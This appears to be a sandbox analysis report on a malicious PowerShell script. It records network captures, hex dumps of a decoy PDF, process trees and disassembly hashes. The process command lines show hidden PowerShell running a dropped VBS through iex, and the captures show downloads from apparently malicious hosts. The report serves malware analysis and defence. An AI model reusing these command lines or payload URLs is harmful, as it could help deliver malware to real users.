                                                                                    Dec 19, 2024 12:44:28.644074917 CET1.1.1.1192.168.2.70x3fb3No error (0)astenterprises.com.pk107.161.23.150A (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 12:44:32.527728081 CET1.1.1.1192.168.2.70x4cc6No error (0)www.bluemaxxlaser.com203.175.174.69A (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 12:44:38.093642950 CET1.1.1.1192.168.2.70x3114No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 12:44:38.093642950 CET1.1.1.1192.168.2.70x3114No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 12:44:44.411576033 CET1.1.1.1192.168.2.70xaa8aNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 19, 2024 12:44:57.565195084 CET1.1.1.1192.168.2.70x4eeaNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 19, 2024 12:45:21.658581972 CET1.1.1.1192.168.2.70x520No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • www.astenterprises.com.pk
                                                                                    • www.bluemaxxlaser.com

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.749723203.175.174.69807572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 19, 2024 12:44:32.652717113 CET80OUTGET /ms/ms.vbs HTTP/1.1
                                                                                    Host: www.bluemaxxlaser.com
                                                                                    Connection: Keep-Alive
                                                                                    Dec 19, 2024 12:44:34.184578896 CET516INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 19 Dec 2024 11:44:33 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 315
                                                                                    Keep-Alive: timeout=5, max=100
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.749712107.161.23.1504437572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-19 11:44:29 UTC127OUTGET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                                                    Host: www.astenterprises.com.pk
                                                                                    Connection: Keep-Alive
                                                                                    2024-12-19 11:44:30 UTC217INHTTP/1.1 200 OK
                                                                                    Connection: close
                                                                                    content-type: application/pdf
                                                                                    last-modified: Sun, 28 Jan 2024 19:03:01 GMT
                                                                                    accept-ranges: bytes
                                                                                    content-length: 871324
                                                                                    date: Thu, 19 Dec 2024 11:44:30 GMT
                                                                                    server: LiteSpeed
                                                                                    2024-12-19 11:44:30 UTC16384INData Raw: 25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 31 32 39 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 36 35 33 32 34 38 2f 4f 20 31 33 31 2f 45 20 38 36 34 32 33 2f 4e 20 35 2f 54 20 36 35 32 37 37 30 2f 48 20 5b 20 34 39 37 20 32 37 33 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 31 34 33 20 30 20 6f 62 6a 0d 3c 3c 2f 44 65 63 6f 64 65 50 61 72 6d 73 3c 3c 2f 43 6f 6c 75 6d 6e 73 20 35 2f 50 72 65 64 69 63 74 6f 72 20 31 32 3e 3e 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 44 5b 3c 45 33 39 35 37 36 43 34 37 35 41 42 45 43 34 33 41 31 38 37 42 39 44 37 38 30 43 34 37 35 37 44 3e 3c 36 34 31 43 41 32 38 37 30 33 43 34 42 31 34 34 38 38 36 46 33 34 32 30 32 33 42 33 34 35
                                                                                    Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B345
                                                                                    2024-12-19 11:44:30 UTC16384INData Raw: 4b 4b 4b f4 b8 e9 cf 0b a9 9e 76 d3 14 23 28 9c 68 17 25 44 45 32 9b e4 30 63 de da 74 55 51 91 17 0f 23 b9 74 42 79 99 8f 15 a5 ab 6a 2d 56 56 3a 41 91 9b da fa 0f ac 3d b1 66 fa f2 fe 83 1f ae 7f f5 f4 91 8d 1b 8f 1c 79 71 63 43 8e f6 13 91 4c 3d ba a0 bb 30 72 b9 50 28 fc b1 6b ef 29 f2 46 e1 b5 4f 6f 93 56 b2 fc d6 f7 7f 8a 68 bc 82 40 bb 8f 18 d3 88 9b 23 ac 5b 1b 5f f9 98 a0 8d 65 0b c6 04 6d 34 17 e3 49 b1 4b 9a 05 db b4 aa db c4 4d 74 17 dd e7 12 8f 8a 44 05 59 a2 82 2a 11 83 92 4b 9a 93 5d 8d ef 13 90 04 7a cd 8f 5c 75 ce 6c 14 6e da 96 03 d7 98 03 57 b7 03 57 cc 96 1d e6 60 1c 43 9c 83 be 88 21 d9 a6 a7 5a e2 b6 dc dc 96 44 12 92 2d 51 29 ac 9f 21 19 b2 05 46 a9 ba 6a 74 47 9c 0b 07 a3 b5 30 cb 0f c6 7a be 33 90 c3 d2 e3 5c 51 1b 63 53 65 5b 92
                                                                                    Data Ascii: KKKv#(h%DE20ctUQ#tByj-VV:A=fyqcCL=0rP(k)FOoVh@#[_em4IKMtDY*K]z\ulnWW`C!ZD-Q)!FjtG0z3\QcSe[
                                                                                    2024-12-19 11:44:30 UTC16384INData Raw: ed 2b 5d eb ed eb 5d 1c 2a ad 66 a8 50 9d 10 15 d2 5d 0e 75 89 22 17 a4 6d 26 47 51 ca 35 42 88 c3 b3 09 47 4c 80 b6 92 8c b5 95 6c 19 f8 f6 d9 f7 91 fa dc ad 57 af 4d dc fe d5 c9 be 57 4e 0e ee ea 3b c9 fa 50 6a f7 f6 89 bf 8d 5f bc f5 0d 14 41 ee 0b e7 2f fc f9 ec f9 73 e4 27 f5 4d 74 70 75 84 2a 2f 13 41 57 a8 0a f5 4a f8 01 fc 45 dc 8a b9 5c f4 78 94 ad 8d 4e 93 e2 35 99 40 a6 66 61 cd e6 68 7f d4 d9 1c 6c 36 96 05 97 19 ab 9d 6b a5 62 b0 68 74 3a 37 49 1d b8 3b b8 c9 18 89 5e f2 5f d5 ae 86 2e 45 6e f8 6f 44 ae 47 27 a3 6a 9c 6b c4 8d 81 59 5c 33 7e 98 5b 86 d7 e0 bf 8b b7 6a 26 b0 a8 c8 36 35 1c 06 a3 55 c3 b2 c8 c8 7a 15 50 ba 05 28 7d 0a a8 70 41 4f 8c 0a 08 0b 79 a1 5d d8 29 70 51 8a 55 94 22 26 0c 4f 8e e5 45 80 4b d0 2a 9f c1 70 69 f1 31 e5 4b
                                                                                    Data Ascii: +]]*fP]u"m&GQ5BGLlWMWN;Pj_A/s'Mtpu*/AWJE\xN5@fahl6kbht:7I;^_.EnoDG'jkY\3~[j&65UzP(}pAOy])pQU"&OEK*pi1K
                                                                                    2024-12-19 11:44:30 UTC16384INData Raw: f0 0a e0 02 58 65 b0 11 40 67 2b c0 87 c0 35 fc 13 79 8d 58 c0 10 a0 b2 bf 79 e8 c6 67 1f 79 46 9e e7 3a d8 5f d9 fb 64 23 66 fc 2f ec 03 c9 1f 62 57 13 fc 67 f6 ae e4 2b e0 38 78 85 bd e7 c5 39 c9 b5 22 4f 50 27 22 4e 29 e0 34 f2 f7 b1 77 e6 ba a3 bc 9e 6b c7 f1 1c 8f 19 36 0d 64 81 41 60 0c 98 05 5a d8 25 d6 e5 3d c5 a3 68 64 89 ac e0 fd e7 cc 23 5f 4b 7e 8d bc aa 12 eb 19 6e 19 7b b1 00 75 61 8c dd 8f c2 83 39 a7 9f 33 98 65 9c f9 23 8a c2 18 a7 7f 0b 4f 18 e3 97 bf 81 27 8c f1 b3 13 f0 84 31 9e 3b 06 4f 18 e3 a9 67 e0 09 63 8c 8e c1 13 c6 18 1c 81 07 e3 b3 97 df ea fe 31 cf 0c 3e 4b f5 5c 98 cd 60 96 66 30 4b 33 98 a5 19 12 64 33 e2 47 6e 07 c5 d8 fe e4 f5 f4 60 c6 ce 5a e6 e6 1e ee 2c 52 e7 6d ea ec a7 ce ab d4 99 a4 ce 71 ea 9c a0 ce 1e ea 1c a2 8e
                                                                                    Data Ascii: Xe@g+5yXygyF:_d#f/bWg+8x9"OP'"N)4wk6dA`Z%=hd#_K~n{ua93e#O'1;Ogc1>K\`f0K3d3Gn`Z,Rmq
                                                                                    2024-12-19 11:44:30 UTC16384INData Raw: e6 09 e6 76 33 e7 20 39 5e d7 78 5c 72 bd 06 f7 03 59 e9 3e 2d 95 8a b9 83 39 2b 4d 32 5a 61 cf 2e f3 cb 65 b2 fb 90 ac 63 6f ef a1 bc c6 ed 21 4b fd 91 c4 9b 86 33 5f 20 23 19 ff 3c c6 9a 44 ce d9 ac df cc 33 8c 73 34 a2 45 46 69 ce e6 3f 28 cd de 50 6c 32 6a e3 d5 61 e7 b7 73 2e 74 1f 6e 92 02 3f 87 75 3e ab 77 4d 78 18 bd 03 a8 d6 fd 61 af b3 fc 7b d8 7b a4 de 55 9c d7 a9 e6 59 d6 e5 b0 3d 47 55 71 1d 1d 72 4c 4b 78 9a f1 b2 e8 9b 85 14 fa ab cc e1 7f 39 cc b7 27 ef f3 fd 27 a5 80 3b b0 98 fb 6c 8a 5f c2 7a ed 95 6e f6 ae 65 fd fd e1 32 d0 ea 73 44 1a 33 72 39 2b bf 97 89 de 11 fa 6f 0a 5b bd de d8 60 0f b9 87 b6 33 19 6b 86 de 8b cc ab 21 73 b6 38 e6 a3 f0 44 e0 c9 4d c6 c8 f5 fc c3 f3 7e 9c d4 55 63 44 7c 64 a1 5b 2c 23 9d 33 52 18 4c a7 ff e7 ac 41
                                                                                    Data Ascii: v3 9^x\rY>-9+M2Za.eco!K3_ #<D3s4EFi?(Pl2jas.tn?u>wMxa{{UY=GUqrLKx9'';l_zne2sD3r9+o[`3k!s8DM~UcD|d[,#3RLA
                                                                                    2024-12-19 11:44:30 UTC16384INData Raw: 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 00 3f 00 c0 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66
                                                                                    Data Ascii: C?"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdef
                                                                                    2024-12-19 11:44:30 UTC16384INData Raw: 42 63 f6 91 ac 1c 27 a7 50 cf 3e 4d fa d1 56 75 d0 ba c5 64 81 1a e6 4c e6 58 0c d5 26 8d 98 fa 33 16 57 24 7e ce 0d 4d b4 4e e0 f1 9d a4 83 d6 ad f8 85 85 a3 92 91 35 88 bd 03 2b 42 68 57 83 ca 8b eb 0a 26 10 84 26 17 0f 24 e1 b0 a4 2a f0 34 91 e7 9e c9 ab bc 37 82 b3 3c e6 68 87 ab e0 87 8c 95 38 94 3f 89 f6 74 69 2e 63 10 88 29 1a de d4 82 08 7f 0f d5 a4 1b 8d 61 79 c7 6f 9d e0 37 4a 89 38 17 e9 e4 95 dd 0d 7d 4f b3 30 56 d1 0f 1c 57 76 69 e3 4b 9b 0b d3 f3 e3 1a d9 e4 26 c2 70 53 39 67 76 0d 9f 1c f4 20 16 3a db 45 1d c7 b7 5c d1 9f 30 3d 72 3f aa ba 3c 22 fd 70 1b 45 03 b3 43 32 bf d8 82 1f e4 4f 1d 0f 11 35 f9 12 53 6d 59 4a 7b 27 f0 ef 43 32 e2 85 41 65 c5 a3 51 82 27 2e 9e 0e 45 46 7d 6b 32 7c 43 4a 16 e0 ee b0 58 c2 df 44 9e b6 f4 11 a9 53 55 b4
                                                                                    Data Ascii: Bc'P>MVudLX&3W$~MN5+BhW&&$*47<h8?ti.c)ayo7J8}O0VWviK&pS9gv :E\0=r?<"pEC2O5SmYJ{'C2AeQ'.EF}k2|CJXDSU
                                                                                    2024-12-19 11:44:30 UTC16384INData Raw: 74 f9 ed f0 78 28 61 e2 0c 41 23 be 47 c9 59 95 29 28 4a 96 a2 02 52 09 24 ec 00 dc c5 44 80 24 ab 2e a9 da ee 77 e0 9a 05 5c 51 a7 2a 92 c8 9b b9 49 6d 4e a7 8a f6 e9 c5 d7 a7 b6 18 47 ea ce ed 40 04 cf 01 f3 af 70 ac 7e 19 60 04 e7 fb fc 28 5c f7 6a 0c bd 93 ae 4b d1 0d 4e 58 cd 4c 14 a5 08 0f 37 7b ab 41 a5 ef bf 9e dc af 16 60 b0 e3 3d cc 6d 0b 4d 78 5b f6 55 58 87 e9 b5 ae 24 43 a0 f2 93 9f 94 3c 96 c3 d2 aa 72 d5 79 26 67 a5 16 16 cb e8 4a d2 52 6e 2c a1 71 af 3b f2 f6 c1 ec 38 6e 2d 22 14 58 f0 f1 23 fd e5 9c 2c 8c 41 4d 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 fc 3b 1b 6f 63 68 e3 ac 79 1f 65 d1 71 36 91 2b c0 4f f8 ab 4a e2 aa 9c d4 9c 85 04 4d ad 6f 39 c0 13 2e 16 4e a7 84 7e e7 98 f1 f5 eb 18
                                                                                    Data Ascii: tx(aA#GY)(JR$D$.w\Q*ImNG@p~`(\jKNXL7{A`=mMx[UX$C<ry&gJRn,q;8n-"X#,AM H"AD$ H"AD$ H";ochyeq6+OJMo9.N~
                                                                                    2024-12-19 11:44:30 UTC16384INData Raw: e4 47 fa 93 f1 82 27 78 df fe 44 7f a9 3f 18 22 fa 04 1d 41 04 75 06 f0 45 fb 04 48 22 41 12 08 90 44 82 24 11 20 89 04 51 dc 55 50 99 a6 50 a7 e7 25 10 5c 7d 96 1c 5b 69 4e a7 89 29 24 73 07 d9 ee de 08 bc 08 cf be dc 5d a0 f0 56 33 a8 d2 a8 18 6e a5 31 26 cc cb a8 6d 6d b0 f2 92 52 95 90 08 e1 04 6d ee 1e b8 22 a2 7f c4 57 b5 07 f4 9d 57 ea d3 1f 82 08 9f e2 2b da 83 fa 4e ab f5 69 8f c1 04 4f f1 15 ed 41 fd 27 55 fa b4 c7 e0 82 27 f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 16 5a 8b ff 00 10 4e d3 b5 39 e6 a5 1c c2 d5 54 25 c5 24 15 7c 9e 60 68 4d b7 29 02 08 a5 d8 bb b7 0f 69 7c 3e d3 2f cb e1 ba a3 a5 c4 05 10 18 7c f2 3a 58 03 b5 fa 0f 3e a4 55 df f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 13 fc 45 7b 50 7f 49 d5 7e ad 31 f8 20 89 fe 22 bd a8 3f a4 ea bf 56 98 fc
                                                                                    Data Ascii: G'xD?"AuEH"AD$ QUPP%\}[iN)$s]V3n1&mmRm"WW+NiOA'U'ZcAZN9T%$|`hM)i|>/|:X>UZcAE{PI~1 "?V
                                                                                    2024-12-19 11:44:30 UTC16384INData Raw: 65 4a 6b 65 99 59 69 a6 d1 2e 92 09 42 56 9d 76 36 de de ee 91 3f a8 5c e0 5f 5b 77 e3 3c 3f c5 d2 61 a4 01 53 f1 61 dd 5d 12 d9 1d 42 6b 0c 37 40 71 c6 94 df 77 c2 a0 a5 a4 83 70 01 dc f3 3e be 57 b4 31 5f be e0 40 10 00 be 7d bd b9 8a 65 3d 97 15 d8 04 b8 5c 83 c0 88 f9 a2 a4 2b 1d 8b 70 55 46 a6 cd 41 29 97 42 d0 b0 b5 5b 80 5f 5b f5 d6 e0 ef 6f 2d 74 8e 37 10 b5 e5 c3 3c b9 5b ad bc 99 96 36 33 b1 a6 69 37 fc a9 0a 7b 33 ca 4a 38 c3 12 33 68 6e 4d 01 21 68 4a 85 ac 39 1b 5b 71 ef bd b4 b4 0e 21 79 fb e4 89 91 a0 a1 1c ce 53 6f 85 43 bf ac 34 41 f2 de 4d 55 e1 86 b2 e5 9c 31 26 d4 b4 84 cb 69 03 84 2c 85 01 73 a7 4d 2d e0 7a f2 8e e2 62 17 d2 c3 f7 3f ee aa b0 cb 9a 6f 47 0d 3c 8c a4 4d 57 1e 62 e5 7c 8e 39 a1 2a 4a 69 e6 94 e7 00 40 5f 12 7f 7a da eb
                                                                                    Data Ascii: eJkeYi.BVv6?\_[w<?aSa]Bk7@qwp>W1_@}e=\+pUFA)B[_[o-t7<[63i7{3J83hnM!hJ9[q!ySoC4AMU1&i,sM-zb?oG<MWb|9*Ji@_z


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:06:44:17
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\2rTi9MgX25.ps1"
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:2
                                                                                    Start time:06:44:17
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff75da10000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:06:44:19
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"
                                                                                    Imagebase:0x7ff741d30000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:06:44:31
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
                                                                                    Imagebase:0x7ff702560000
                                                                                    File size:5'641'176 bytes
                                                                                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:8
                                                                                    Start time:06:44:32
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                    Imagebase:0x7ff6c3ff0000
                                                                                    File size:3'581'912 bytes
                                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:9
                                                                                    Start time:06:44:32
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                    Imagebase:0x7ff7b4ee0000
                                                                                    File size:55'320 bytes
                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    General

                                                                                    Target ID:10
                                                                                    Start time:06:44:33
                                                                                    Start date:19/12/2024
                                                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2092 --field-trial-handle=1636,i,14229449947931004828,5729457829333662264,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                    Imagebase:0x7ff6c3ff0000
                                                                                    File size:3'581'912 bytes
                                                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Disassembly

                                                                                    Reset < >

                                                                                      Executed Functions

                                                                                      Function 00007FFAAB854F15 Relevance: 2.9, Strings: 2, Instructions: 440COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1627544015.00007FFAAB850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaab850000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 6fS$A_H
                                                                                      • API String ID: 0-282506511
                                                                                      • Opcode ID: 93db9acfba1c7d1caf187f1e03680c366be678af6cdec466bfea69ca351d73de
                                                                                      • Instruction ID: 3322ed9296ca8358588430d1629cd9c19dbdeb440b756a5567f15ddcf3341b2c
                                                                                      • Opcode Fuzzy Hash: 93db9acfba1c7d1caf187f1e03680c366be678af6cdec466bfea69ca351d73de
                                                                                      • Instruction Fuzzy Hash: 90D1387290EBCA9FE795DB6C88556F9BF91EF0A250B0841FED04DC70A3D919A809C3D1
                                                                                      Function 00007FFAAB8521C4 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1627544015.00007FFAAB850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaab850000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6dcf55ae1b4d5e6e1707b76b4ced94ee3a0713e5bfe1076a023bbafda22b1427
                                                                                      • Instruction ID: 6a17f021a50bf099f1bacf13cd4c2ec0ab15a43757613ae810dfd681781581c1
                                                                                      • Opcode Fuzzy Hash: 6dcf55ae1b4d5e6e1707b76b4ced94ee3a0713e5bfe1076a023bbafda22b1427
                                                                                      • Instruction Fuzzy Hash: 0A212922A1EA8B8BE3A5DF2C5841278A6C2EF5A290B4881FDD04DC71A3DD18BC0942C1
                                                                                      Function 00007FFAAB783BB5 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1626774633.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaab780000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                      • Instruction ID: ce69ded587dae1c7d69930ebf39182a19421a045af7da8356fa5db403c8c583c
                                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                      • Instruction Fuzzy Hash: D101677111CB0C8FD754EF0CE451AB5B7E0FB95364F10056DE58AC3661DA36E882CB45

                                                                                      Executed Functions

                                                                                      Function 00007FFAAB853135 Relevance: .4, Instructions: 450COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1405800350.00007FFAAB850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB850000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_7ffaab850000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: abf17be59ead4c4bb8df382a330ba17e7ebce4370cfbc798d8958a8a3beb57d1
                                                                                      • Instruction ID: 4a30f70ab667c46cdd9e25951d861460abfd34592e0f85cddee6fe6da504552b
                                                                                      • Opcode Fuzzy Hash: abf17be59ead4c4bb8df382a330ba17e7ebce4370cfbc798d8958a8a3beb57d1
                                                                                      • Instruction Fuzzy Hash: E9D1487291EBCA8FE756DB6C98155B97F91FF1A290B0841FED04EC70A3DD18A809C391
                                                                                      Function 00007FFAAB7833B5 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.1405417188.00007FFAAB780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB780000, based on PE: false
